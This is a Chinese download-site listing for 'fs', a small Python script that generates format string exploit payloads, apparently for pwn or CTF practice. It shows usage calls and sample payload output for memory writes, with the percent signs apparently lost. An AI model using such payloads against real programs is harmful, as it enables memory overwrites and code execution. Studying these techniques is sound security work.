fs:格式字符串漏洞利用生成

时间:2024-05-29 01:07:09
【文件属性】:

文件名称:fs:格式字符串漏洞利用生成

文件大小:3KB

文件格式:ZIP

更新时间:2024-05-29 01:07:09

Python

fs 使用此脚本可以轻松生成fromat字符串漏洞。 from fs import * print ([ one_by_one ( 0xffffc14c , 0xffffc6d0 , 11 )]) # ['L\xc1\xff\xffM\xc1\xff\xffN\xc1\xff\xffO\xc1\xff\xff2x$n$6x$nWx$n$n'] print ([ two_by_two ( 0xffffc14c , 0xffffc6d0 , 11 )]) # ['N\xc1\xff\xffL\xc1\xff\xffP888x$hn639x$hn'] python fs.py ffffc14c ffffc6d0 11 one Format string is: bash: $( printf " \x4c\


【文件预览】:
fs-master
----sample.py(154B)
----fs.py(3KB)
----.gitignore(808B)
----README.md(1KB)

网友评论